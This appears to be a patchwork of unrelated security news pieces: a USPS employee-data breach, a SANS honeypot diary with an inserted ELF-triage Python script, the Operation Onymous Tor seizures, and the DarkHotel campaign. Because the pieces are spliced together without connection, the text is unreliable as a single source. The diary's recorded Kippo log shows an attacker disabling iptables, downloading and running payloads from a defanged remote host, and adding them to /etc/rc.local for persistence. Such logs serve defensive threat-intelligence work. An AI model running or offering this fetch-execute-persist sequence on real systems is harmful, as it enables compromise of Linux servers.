(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

All United States Postal Service (USPS) employees’ personal data—including names, addresses, social security numbers—has been exposed as the result of a hack believed to have originated from China. According to its own tally, USPS employs over 600,000 people.

"We began investigating this incident as soon as we learned of it, and we are cooperating with the investigation, which is ongoing," David Partenheimer, a USPS spokesman, wrote in a statement (PDF) on Monday. "The investigation is being led by the Federal Bureau of Investigation and joined by other federal and postal investigatory agencies. The intrusion is limited in scope and all operations of the Postal Service are functioning normally."

The USPS does not believe that in-store customer data was exposed, but customers who contacted the agency via e-mail or phone between January 1 and August 16, 2014 may have been.



A number of my fellow Handlers have discussed Kippo [1], an SSH honeypot that records adversarial behaviour, whether human or machine. Normal behaviour against my set of Kippo honeypots is predictable in its randomness: a mixture of known bad IP ranges, researchers, scanning and probing from behind Tor, and would-be attackers manually entering commands from their jump boxes or home machines.

What caught my eye was a number of separate brute force attacks that succeeded and then manifested the same behaviour, all within a single day. Despite the IP addresses of the scans, the pickup file locations and the downloaded file names all being different, the scripts captured in the Kippo logs and, more importantly in this case, the hashes of the two files [2] [3] that were retrieved and run against Kippo's fake system were identical.

So what? you may ask. I like to draw lessons learnt from this type of honeypot interaction; they provide tactical and operational intelligence that can be passed to other teams. Don't limit this kind of information gathering to the security teams: for example, our friends in audit and compliance need to know which common usernames and passwords are being used in these attacks so that their guidance stays current. If your organisation runs internet-facing Linux systems with SSH listening on TCP port 22, a one-line note in the daily report to security stakeholders may be in order for awareness.

Here are some of the ones I detailed that would be passed to the security team.

1) The password 12345 isn't very safe. Who knew? (implied sarcasm)
2) The adversary ran a scripted session with no error checking (see the recorded commands below: the script carries on after a failed execution)
3) The roughly two hours of attacks from each unique IP address shows a lack of centralised command and control
4) The dropped malware was already being reported on VirusTotal a day before I submitted my copies, so this is most likely a relatively new set of scans and attacks
5) The target of the attack is Linux systems
6) The adversary's file-hosting locations are Windows systems based in China running HFS v2.3c 291 [4], a free Windows web server, on port 8889. That HFS version has a known remote command execution flaw, so the owner should probably look at updating
7) Static or dynamic analysis of the captured Linux binaries provided a wealth of further indicators
8) The IP addresses of the scanning and hosting servers
9) And a nice list of usernames and passwords to add to the "never, ever use these for anything" list (root/root, root/password, admin/admin etc.)

I'd normally offer up any captured binaries for further analysis, if the teams had the capacity to do it, or dump them through an automated sandbox like Cuckoo [5] to pick out the more obvious indicators of compromise or further pieces of information to research (especially hard-coded commands, IP addresses, domain names etc.).
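To show the kind of indicator harvest the paragraph above has in mind, here is a small static-triage script. It is an added example, not code from the diary or from Cuckoo, and it works on a constructed stand-in for a dropped ELF rather than on the samples in [2] and [3]; the IPs, URL and path planted in the blob are documentation placeholders (an assumption for illustration). It parses the ELF identification header, computes the MD5 and SHA-256 you would match against a VirusTotal report, and runs a strings(1)-style pass to pull out URLs, IPv4 addresses, absolute paths and shell commands.

```python
"""Static triage of a captured Linux binary: ELF header, hashes, embedded indicators.

Added example, not code from the ISC diary or from Cuckoo. The "binary" is a
constructed byte blob with a minimal ELF header and a few planted strings; it
is not either of the samples referenced in the diary, and the IPs and URL in it
are documentation placeholders.
"""
import hashlib
import re

# e_machine values from the ELF specification
EM_NAMES = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def build_sample_binary():
    """Constructed stand-in for a dropped ELF: 64-bit little-endian x86-64
    header followed by NUL-separated data, one item too short to count as a string."""
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8  # class, data, version, OSABI
    header = e_ident + (2).to_bytes(2, "little") + (62).to_bytes(2, "little")  # ET_EXEC, EM_X86_64
    header = header.ljust(64, b"\x00")
    planted = [b"service iptables stop", b"http://198.51.100.23:8889/badfile1",
               b"/etc/rc.local", b"203.0.113.77", b"ab"]
    return header + b"\x00".join(planted) + b"\x00"


SAMPLE_BINARY = build_sample_binary()


def elf_header(blob):
    """Parse e_ident, e_type and e_machine; None when the ELF magic is absent."""
    if len(blob) < 20 or blob[:4] != b"\x7fELF":
        return None
    order = "little" if blob[5] == 1 else "big"  # EI_DATA selects the byte order
    machine = int.from_bytes(blob[18:20], order)
    return {"class": {1: "ELF32", 2: "ELF64"}.get(blob[4], "unknown"),
            "endian": order,
            "type": int.from_bytes(blob[16:18], order),
            "machine": EM_NAMES.get(machine, hex(machine))}


def file_hashes(blob):
    """MD5 and SHA-256 so a sample can be matched against VirusTotal-style reports."""
    return {"md5": hashlib.md5(blob).hexdigest(), "sha256": hashlib.sha256(blob).hexdigest()}


def printable_strings(blob, min_len=4):
    """Equivalent of strings(1): runs of printable ASCII at least min_len long."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def extract_indicators(strings):
    """Pull out what the diary says to research: URLs, IPv4s, absolute paths, commands."""
    urls, ipv4, paths, commands = set(), set(), set(), set()
    for s in strings:
        urls.update(re.findall(r"https?://[^\s\"']+", s))
        ipv4.update(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", s))
        if s.startswith("/"):
            paths.add(s)
        if re.search(r"\b(?:iptables|wget|curl|chmod|crontab|nohup)\b", s):
            commands.add(s)
    return {k: sorted(v) for k, v in
            (("urls", urls), ("ipv4", ipv4), ("paths", paths), ("commands", commands))}


def triage_binary(blob):
    """One report per sample: header facts, hashes and harvested indicators."""
    return {"elf": elf_header(blob), "hashes": file_hashes(blob),
            "indicators": extract_indicators(printable_strings(blob))}


if __name__ == "__main__":
    import json
    print(json.dumps(triage_binary(SAMPLE_BINARY), indent=2))
```

Point `triage_binary` at the bytes of a real capture (read with `open(path, "rb").read()`) to get the same report for it; the strings pass is deliberately crude, so a packed or stripped sample will yield little, which is itself a signal that the sandbox run is worth the effort.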

If you have any other comments on how to make honeypot collections relevant, please drop me a line!

Recorded commands by Kippo
service iptables stop
wget hxxp://x.x.x.x:8889/badfile1
chmod u+x badfile1
./ badfile1
cd /tmp
tmp# wget hxxp://x.x.x.x:8889/badfile2
chmod u+x badfile2
./ badfile2
bash: ./ badfile2: command not found
/tmp# cd /tmp
/tmp# echo cd /root >> /etc/rc.local
cd /root >> /etc/rc.local
/tmp# echo ./ badfile1 >> /etc/rc.local
./ badfile1 >> /etc/rc.local
/tmp# echo ./ badfile2 >> /etc/rc.local
./ux badfile2 >> /etc/rc.local
/tmp# echo /etc/init.d/iptables stop >> /etc/rc.local
/etc/init.d/iptables stop >> /etc/rc.local

[1] Kippo is a medium-interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker. https://github.com/desaster/kippo

[2] File 1, MD5 0601aa569d59175733db947f17919bb7: https://www.virustotal.com/en/file/22ec5b35a3b99b6d1562becb18505d7820cbcfeeb1a9882fb7fc4629f74fbd14/analysis/
[3] File 2, MD5 60ab24296bb0d9b7e1652d8bde24280b: https://www.virustotal.com/en/file/f84ff1fb5cf8c0405dd6218bc9ed1d3562bf4f3e08fbe23f3982bfd4eb792f4d/analysis/

[4] HFS (HTTP File Server): http://sourceforge.net/projects/hfs/
[5] Cuckoo Sandbox: http://www.cuckoosandbox.org/


The FBI-ICE-Europol seizure page that greeted visitors to Doxbin's main .onion address. Doxbin wasn't named in the Justice Department's filings, and no explanation of the seizure has been given.

In a blog post written on November 9, Tor Project director Andrew Lewman went over the possible ways that over 400 hidden services on dozens of servers were located by law enforcement during Operation Onymous. While some of the servers were related to criminal activity (such as Silk Road 2.0), at least some of the servers were not—including several that were acting as infrastructure for Tor’s anonymizing network. And the only answer Lewman could currently offer as to how the sites were exposed was “We don’t know.”

That's unnerving not just to the operators of the many illicit sites taken down by Operation Onymous; it's also a concern for anyone using Tor to evade surveillance by more oppressive governments. Activists, dissidents, and journalists, for example, all rely on the same Tor infrastructure.

“If you are an activist or a journalist in these countries, your government thinks you are a criminal,” Eva Galperin, Global Policy Analyst for the Electronic Frontier Foundation, told Ars. “And you can learn a lot about good operational security practices by watching where criminals go wrong reading the affidavits on these cases, because your government is treating you as a criminal.”



Researchers have uncovered a seven-year-old malware operation that combines advanced cryptographic attacks, zero-day exploits, and well-developed keyloggers to target elite executives staying in luxury hotels during business trips.

The attackers behind "DarkHotel," as the advanced persistent threat has been dubbed, appear to know in advance when a targeted exec will check in and check out of a hotel. Victims are infected through a variety of methods, including bogus software updates for Adobe Flash, Google Toolbar, or other trusted software that are presented when the exec uses the hotel's Wi-Fi or wired Internet access. In many cases, the attack code is signed with a trusted digital certificate that the attackers were able to clone by factoring the underlying 512-bit private key. While factoring weak 512-bit keys has been practical for several years, the crypto attack nonetheless is an "advanced" capability, particularly a few years ago. Taken together, the characteristics are an indication the operators have some sophistication, said researchers from Kaspersky Lab, the Russia-based security firm that disclosed the campaign.

"The fact that most of the time the victims are top executives indicates the attackers have knowledge of their victims whereabouts, including name and place of stay," the researchers wrote in a report published Monday. "This paints a dark, dangerous web in which unsuspecting travelers can easily fall. While the exact reason why some hotels function as an attacker vector are unknown, certain suspicions exist, indicating possibly a much larger compromise. We are still investigating this aspect of the operation and will publish more information in the future."

